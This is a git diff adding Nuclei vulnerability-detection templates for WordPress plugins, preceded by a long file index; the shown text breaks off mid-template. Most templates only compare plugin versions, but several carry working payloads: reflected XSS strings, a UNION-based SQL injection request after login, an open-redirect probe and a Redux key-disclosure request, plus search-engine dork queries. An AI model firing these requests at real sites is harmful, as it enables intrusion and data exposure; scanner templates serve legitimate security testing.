+./poc/other/simple-notification-fdd7ff26d7f63a7b2fa52cbfdc17c04a.yaml ./poc/other/simple-org-chart-11ce1c2850e056152ce51409c1527728.yaml ./poc/other/simple-org-chart-76ee77ce8284ca42a790472577f97109.yaml ./poc/other/simple-org-chart.yaml @@ -112567,6 +112642,7 @@ ./poc/other/so-pinyin-slugs-f2aa28aa0471358187c21cf264a89ea0.yaml ./poc/other/so-pinyin-slugs.yaml ./poc/other/so-widgets-bundle-12246c67482cc81113f95b53d4a54f04.yaml +./poc/other/so-widgets-bundle-180c430fc45a724a110d6335d32e96f4.yaml ./poc/other/so-widgets-bundle-7815d5616dfb70208d5884aff281d688.yaml ./poc/other/so-widgets-bundle-92dc9daa82044d420b1ee35cdf66e7ae.yaml ./poc/other/so-widgets-bundle-92ee98fa3b74b713ba950a259247d7f6.yaml @@ -114001,6 +114077,7 @@ ./poc/other/tabs.yaml ./poc/other/tactical-rmm-panel.yaml ./poc/other/taeggie-feed-008b75688d8ae4824127311c231e062f.yaml +./poc/other/taeggie-feed.yaml ./poc/other/tag-groups-6c574efa4ff5ca03835b112134700152.yaml ./poc/other/tag-groups-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/tag-groups-fde2f6f8727bf54acffd47231a11cc05.yaml @@ -115120,6 +115197,7 @@ ./poc/other/tourfic-1d9f77d3fd1cac63b0f82e7f51ec4abc.yaml ./poc/other/tourfic-9780e2f7035fedce1d2d8e67b989062d.yaml ./poc/other/tourfic.yaml +./poc/other/tourmaster-a67429358d0ce99ecc6ba58dd169ed25.yaml ./poc/other/tournamatch-a4b5a383f7eb97489015438c5818a9fe.yaml ./poc/other/tournamatch-f0da102096d10873e37be9abd738c6d0.yaml ./poc/other/tournamatch.yaml @@ -116842,6 +116920,7 @@ ./poc/other/video-popup-027119af6a8a0485c97f2ee05eced458.yaml ./poc/other/video-popup.yaml ./poc/other/video-share-vod-3dfab9cfd6eeddeace596849813fffea.yaml +./poc/other/video-share-vod.yaml ./poc/other/video-sidebar-widgets-00cae4f2b686bd62cebad181eac9d2e4.yaml ./poc/other/video-sidebar-widgets.yaml ./poc/other/video-slider-with-thumbnails-9183fdebb835b88d6b445703dfa7423a.yaml @@ -116956,6 +117035,7 @@ ./poc/other/vironeer-installer.yaml ./poc/other/virtua-software-panel.yaml ./poc/other/virtual traffic manager.yaml +./poc/other/virtual-hdm-for-taxservice-am-b72e78d8893ace58a96e70e16ec3b4d7.yaml ./poc/other/virtual-robotstxt-littlebizzy-b63e739ce43d84ee439f614d7ac75bce.yaml ./poc/other/virtual-robotstxt-littlebizzy.yaml ./poc/other/virtual-smartzone-installer.yaml @@ -117642,6 +117722,7 @@ ./poc/other/wedevs-project-manager-621a86ac69fc43f58c97e1a34ee9115f.yaml ./poc/other/wedevs-project-manager-7123381f3f4a5c51e668bf50607c2d94.yaml ./poc/other/wedevs-project-manager-a8663c4ca882f11da72d9a6e11853e58.yaml +./poc/other/wedevs-project-manager-b583a50e24233331029e3cbee7dc09ae.yaml ./poc/other/wedevs-project-manager.yaml ./poc/other/wedocs-55347e9ac58126992d50d45693e54288.yaml ./poc/other/wedocs-621a86ac69fc43f58c97e1a34ee9115f.yaml @@ -117969,6 +118050,7 @@ ./poc/other/woc-open-close-plugin.yaml ./poc/other/woc-open-close.yaml ./poc/other/woc-order-alert.yaml +./poc/other/woffice-2b39d74568e88403e75df623ca0d523c.yaml ./poc/other/woffice-2d57976b09481b97c0392dd73606ab5a.yaml ./poc/other/woffice-72439da2c603de1022753a521e6e0bbb.yaml ./poc/other/woffice-a061e508f049f80f30df9a19c2bae78c.yaml @@ -120995,6 +121077,8 @@ ./poc/remote_code_execution/bitpay-checkout-for-woocommerce-9f687dc228a54cf40527d75fb8d70f1d.yaml ./poc/remote_code_execution/bitpay-checkout-for-woocommerce.yaml ./poc/remote_code_execution/bitrix-landing-rce.yaml +./poc/remote_code_execution/blaze-online-eparcel-for-woocommerce-028c8bf1a96949a8037d7ca57cb52eb5.yaml +./poc/remote_code_execution/blaze-online-eparcel-for-woocommerce-5a8844d4895daa0c0548d395338c8680.yaml ./poc/remote_code_execution/blind-rce.yaml ./poc/remote_code_execution/blog-designer-pack-rce.yaml ./poc/remote_code_execution/bng-gateway-for-woocommerce-087406cdf6eb3464703324d78c0d0ceb.yaml @@ -121797,6 +121881,7 @@ ./poc/remote_code_execution/image-source-control-isc-1f88dbd2b9c2d6237e296e8c6c1659c5.yaml ./poc/remote_code_execution/image-source-control-isc.yaml ./poc/remote_code_execution/imo-get-file-rce.yaml +./poc/remote_code_execution/import-export-for-woocommerce-bcf2ad7e63917a98b59c548c5519a59f.yaml ./poc/remote_code_execution/import-shopify-to-woocommerce-5deb9cef1a1765aac5362c5a9badb4e5.yaml ./poc/remote_code_execution/import-shopify-to-woocommerce.yaml ./poc/remote_code_execution/import-woocommerce-095fc39d2fec00ef5f77d197f7a50ae0.yaml @@ -128003,11 +128088,13 @@ ./poc/sql/CVE-2024-11902-6f1c9c51f7d943cb9a94f992fddb2671.yaml ./poc/sql/CVE-2024-11904-5fe3b58edbf68a55952920a93fb3f296.yaml ./poc/sql/CVE-2024-1209-262fb41bb4526e178dfcbc92b07bdb7c.yaml +./poc/sql/CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c.yaml ./poc/sql/CVE-2024-12128-5b31f632a2dbc3187253dd9153d43eba.yaml ./poc/sql/CVE-2024-12219-5a4cdf95041f5cf0bd0b7732bf8309db.yaml ./poc/sql/CVE-2024-12309-a66a88222b4d4522bfdbcfa49436df90.yaml ./poc/sql/CVE-2024-12333-7b6d410c0b3b65296f542385dba469b2.yaml ./poc/sql/CVE-2024-12441-1756d8f05db11c9f2310e3f212f24527.yaml +./poc/sql/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml ./poc/sql/CVE-2024-1293-affd9a0551db020dec750cedbcd3816e.yaml ./poc/sql/CVE-2024-1294-dfdb0dbdfc95da5675d873e172a0e0c4.yaml ./poc/sql/CVE-2024-1307-3df7481cb6a0937e107851abd321db33.yaml @@ -128418,6 +128505,7 @@ ./poc/sql/CVE-2024-43138-3379c404d07a8b6aa209bfd39e102fdb.yaml ./poc/sql/CVE-2024-43149-48bd2fb7dfa7c0ba66333db47a7aa078.yaml ./poc/sql/CVE-2024-43230-9e8adb139a0d7ed623bea89f5702e850.yaml +./poc/sql/CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa.yaml ./poc/sql/CVE-2024-4324-83e6d760adb900f9290e996e03752999.yaml ./poc/sql/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml ./poc/sql/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml @@ -128644,6 +128732,7 @@ ./poc/sql/CVE-2024-54207-6550e248932e2b5e412bf4389b4db0b2.yaml ./poc/sql/CVE-2024-54247-32dd452fd1db8cb528bb367644d98408.yaml ./poc/sql/CVE-2024-54250-80229f33352eda0e4db54b51c9f141a7.yaml +./poc/sql/CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9.yaml ./poc/sql/CVE-2024-5431-241e169fe8d70647db15866852ef1ef7.yaml ./poc/sql/CVE-2024-5441-ac5094c9721ab0d78dbe312bf4fbf927.yaml ./poc/sql/CVE-2024-5459-5fe3da3314db32ae5a24560dc5ca6f8d.yaml @@ -130408,6 +130497,7 @@ ./poc/sql/easy-post-views-count-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/easy-prayer-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/easy-pricing-tables-e4bddb00b4325b40d1d281bc3333cfb1.yaml +./poc/sql/easy-replace-440c0e499d1853ea7db9693e4d2afca2.yaml ./poc/sql/easy-set-favicon-cd265eedeaef7dbc17fe04f8ffa41e3d.yaml ./poc/sql/easy-settings-for-learndash-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/easy-smooth-scroll-links-6477bf18cad6c823db485408d49b337b.yaml @@ -138638,6 +138728,7 @@ ./poc/wordpress/auto-location-for-wp-job-manager.yaml ./poc/wordpress/automatorwp-3d36e817ef5d4492783d01a29ff6fe85.yaml ./poc/wordpress/automatorwp-4110bf0add7c875f1c9709918ab76148.yaml +./poc/wordpress/automatorwp-c0407e34fa2c909d246b6b41858c80c4.yaml ./poc/wordpress/automatorwp-c6ee3483afd7756ed85b9c0f71a85fc0.yaml ./poc/wordpress/automatorwp-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/automatorwp-d4af396f563d5f931b0131849342faa6.yaml diff --git a/poc/auth/accept-authorize-net-payments-using-contact-form-7.yaml b/poc/auth/accept-authorize-net-payments-using-contact-form-7.yaml new file mode 100644 index 0000000000..f2879a4428 --- /dev/null +++ b/poc/auth/accept-authorize-net-payments-using-contact-form-7.yaml @@ -0,0 +1,59 @@ +id: accept-authorize-net-payments-using-contact-form-7-236bcbdbfe25f4f674ac30a10158deed + +info: + name: > + Accept Authorize.NET Payments Using Contact Form 7 <= 2.2 - Unauthenticated Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d8801b9a-afcb-483b-a018-4f68448e96de?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/" + google-query: inurl:"/wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,accept-authorize-net-payments-using-contact-form-7,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "accept-authorize-net-payments-using-contact-form-7" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2') \ No newline at end of file diff --git a/poc/aws/amazon-docker-config-exposure.yaml b/poc/aws/amazon-docker-config-exposure.yaml new file mode 100644 index 0000000000..c006721468 --- /dev/null +++ b/poc/aws/amazon-docker-config-exposure.yaml @@ -0,0 +1,17 @@ +id: amazon-docker-config-disclosure + +info: + name: Dockerrun AWS Configuration Exposure + author: pd-team + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/Dockerrun.aws.json' + matchers: + - type: word + words: + - 'AWSEBDockerrunVersion' + - 'containerDefinitions' + condition: and \ No newline at end of file diff --git a/poc/config/amazon-docker-config-exposure.yaml b/poc/config/amazon-docker-config-exposure.yaml new file mode 100644 index 0000000000..c006721468 --- /dev/null +++ b/poc/config/amazon-docker-config-exposure.yaml @@ -0,0 +1,17 @@ +id: amazon-docker-config-disclosure + +info: + name: Dockerrun AWS Configuration Exposure + author: pd-team + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/Dockerrun.aws.json' + matchers: + - type: word + words: + - 'AWSEBDockerrunVersion' + - 'containerDefinitions' + condition: and \ No newline at end of file diff --git a/poc/cve/CVE-2012-0901-2139.yaml b/poc/cve/CVE-2012-0901-2139.yaml new file mode 100644 index 0000000000..2a8c5c433b --- /dev/null +++ b/poc/cve/CVE-2012-0901-2139.yaml @@ -0,0 +1,30 @@ +id: CVE-2012-0901 + +info: + name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901 + + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2014-4544-2362.yaml b/poc/cve/CVE-2014-4544-2362.yaml new file mode 100644 index 0000000000..7c453acbc4 --- /dev/null +++ b/poc/cve/CVE-2014-4544-2362.yaml @@ -0,0 +1,37 @@ +id: CVE-2014-4544 + +info: + name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + description: The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability. + reference: + - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb + - https://nvd.nist.gov/vuln/detail/CVE-2014-4544 + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4544 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2021-24750-5763.yaml b/poc/cve/CVE-2021-24750-5763.yaml new file mode 100644 index 0000000000..4b0459eb3b --- /dev/null +++ b/poc/cve/CVE-2021-24750-5763.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-24750 + +info: + name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI + author: cckuakilong + severity: high + description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks. + reference: + - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py + - https://nvd.nist.gov/vuln/detail/CVE-2021-24750 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-24750 + cwe-id: CWE-89 + tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "266f89556d2b38ff067b580fb305c522" + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2021-25111-5801.yaml b/poc/cve/CVE-2021-25111-5801.yaml new file mode 100644 index 0000000000..506e3d7994 --- /dev/null +++ b/poc/cve/CVE-2021-25111-5801.yaml @@ -0,0 +1,26 @@ +id: CVE-2021-25111 + +info: + name: English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect + author: akincibor + severity: medium + description: The plugin does not validate the admin_custom_language_return_url before redirecting users o it, leading to an open redirect issue. + reference: + - https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4 + tags: wp-plugin,redirect,wordpress,wp,cve,cve2021,unauth + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-25111 + cwe-id: CWE-601 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/poc/cve/CVE-2021-38314-6300.yaml b/poc/cve/CVE-2021-38314-6300.yaml new file mode 100644 index 0000000000..46927bbbb5 --- /dev/null +++ b/poc/cve/CVE-2021-38314-6300.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-38314 + +info: + name: Redux Framework - Unauthenticated Sensitive Information Disclosure + author: meme-lord + severity: medium + reference: + - https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/ + - https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c + - https://blog.sorcery.ie/posts/redux_wordpress/ + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-38314 + description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`." + +requests: + - raw: + - | + GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "len(body)<50" + + - type: regex + name: meme + regex: + - '[a-f0-9]{32}' + part: body + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - "[a-f0-9]{32}" diff --git a/poc/cve/CVE-2021-39322-6339.yaml b/poc/cve/CVE-2021-39322-6339.yaml new file mode 100644 index 0000000000..80b3ada7a5 --- /dev/null +++ b/poc/cve/CVE-2021-39322-6339.yaml @@ -0,0 +1,52 @@ +id: CVE-2021-39322 + +info: + name: WordPress Easy Social Icons Plugin < 3.0.9 - Reflected Cross-Site Scripting + author: dhiyaneshDK + severity: medium + description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. + reference: + - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39322 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322 + - https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-39322 + cwe-id: CWE-79 + tags: wordpress,cve,cve2021,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php//?page=cnss_social_icon_page HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + +# Enhanced by mp on 2022/03/23 diff --git a/poc/cve/CVE-2024-10548-c2c6f9682e36d499e8bfec31ce1d8b0c.yaml b/poc/cve/CVE-2024-10548-c2c6f9682e36d499e8bfec31ce1d8b0c.yaml new file mode 100644 index 0000000000..6d5227800c --- /dev/null +++ b/poc/cve/CVE-2024-10548-c2c6f9682e36d499e8bfec31ce1d8b0c.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10548-c2c6f9682e36d499e8bfec31ce1d8b0c + +info: + name: > + WP Project Manager <= 2.6.15 - Authenticated (Subscriber+) Sensitive Information Exposure via Project Task List REST API + author: topscoder + severity: low + description: > + The WP Project Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.15 via the Project Task List ('/wp-json/pm/v2/projects/1/task-lists') REST API endpoint. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive data including the hashed passwords of project owners (e.g. adminstrators). + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a21b7c40-2090-4262-9105-346db2325612?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-10548 + metadata: + fofa-query: "wp-content/plugins/wedevs-project-manager/" + google-query: inurl:"/wp-content/plugins/wedevs-project-manager/" + shodan-query: 'vuln:CVE-2024-10548' + tags: cve,wordpress,wp-plugin,wedevs-project-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wedevs-project-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wedevs-project-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.15') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11254.yaml b/poc/cve/CVE-2024-11254.yaml new file mode 100644 index 0000000000..1184fe6f99 --- /dev/null +++ b/poc/cve/CVE-2024-11254.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11254-0a41e95f2c7eae4094eccfb9191bc605 + +info: + name: > + AMP for WP – Accelerated Mobile Pages <= 1.1.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the disqus_name parameter in all versions up to, and including, 1.1.1 due to insufficient input validation. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5da82149-c827-4574-8269-b2b798edca59?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11254 + metadata: + fofa-query: "wp-content/plugins/accelerated-mobile-pages/" + google-query: inurl:"/wp-content/plugins/accelerated-mobile-pages/" + shodan-query: 'vuln:CVE-2024-11254' + tags: cve,wordpress,wp-plugin,accelerated-mobile-pages,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/accelerated-mobile-pages/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "accelerated-mobile-pages" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11291.yaml b/poc/cve/CVE-2024-11291.yaml new file mode 100644 index 0000000000..13a5e732fe --- /dev/null +++ b/poc/cve/CVE-2024-11291.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11291-4b3df78ea45d69129dc5fbd828bf0deb + +info: + name: > + Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction <= 2.13.4 - Unauthenticated Content Restriction Bypass to Sensitive Information Exposure + author: topscoder + severity: medium + description: > + The Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.13.4 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e207f1a3-2ca5-46d1-91a9-89652451266c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-11291 + metadata: + fofa-query: "wp-content/plugins/paid-member-subscriptions/" + google-query: inurl:"/wp-content/plugins/paid-member-subscriptions/" + shodan-query: 'vuln:CVE-2024-11291' + tags: cve,wordpress,wp-plugin,paid-member-subscriptions,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/paid-member-subscriptions/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "paid-member-subscriptions" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.13.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11295.yaml b/poc/cve/CVE-2024-11295.yaml new file mode 100644 index 0000000000..e6bd412bb2 --- /dev/null +++ b/poc/cve/CVE-2024-11295.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11295-a4e709d48a2b52b5c9f616e57c38968a + +info: + name: > + Simple Page Access Restriction <= 1.0.29 - Unauthenticated Content Restriction Bypass to Sensitive Information Exposure + author: topscoder + severity: medium + description: > + The Simple Page Access Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.29 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ed92806e-5d75-4a23-a588-821e9ada1b32?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-11295 + metadata: + fofa-query: "wp-content/plugins/simple-page-access-restriction/" + google-query: inurl:"/wp-content/plugins/simple-page-access-restriction/" + shodan-query: 'vuln:CVE-2024-11295' + tags: cve,wordpress,wp-plugin,simple-page-access-restriction,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-page-access-restriction/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-page-access-restriction" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.29') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11356-ef26df4d3b60de17a0b2970f889bcedd.yaml b/poc/cve/CVE-2024-11356-ef26df4d3b60de17a0b2970f889bcedd.yaml new file mode 100644 index 0000000000..625c950eff --- /dev/null +++ b/poc/cve/CVE-2024-11356-ef26df4d3b60de17a0b2970f889bcedd.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11356-ef26df4d3b60de17a0b2970f889bcedd + +info: + name: > + Tour Master - Tour Booking, Travel, Hotel < 5.3.4 - Unauthenticated Stored Cross-Site Scripting via Room Booking + author: topscoder + severity: high + description: > + The Tour Master - Tour Booking, Travel, Hotel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via room booking in all versions up to 5.3.4 (exclusive) due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/12b1b1b4-a62f-451e-a78d-c1d85202a4cf?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-11356 + metadata: + fofa-query: "wp-content/plugins/tourmaster/" + google-query: inurl:"/wp-content/plugins/tourmaster/" + shodan-query: 'vuln:CVE-2024-11356' + tags: cve,wordpress,wp-plugin,tourmaster,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tourmaster/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tourmaster" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 5.3.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11439.yaml b/poc/cve/CVE-2024-11439.yaml new file mode 100644 index 0000000000..a0dad5212a --- /dev/null +++ b/poc/cve/CVE-2024-11439.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11439-475f578349d17c65330df618e26d04b2 + +info: + name: > + ScanCircle <= 2.9.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: 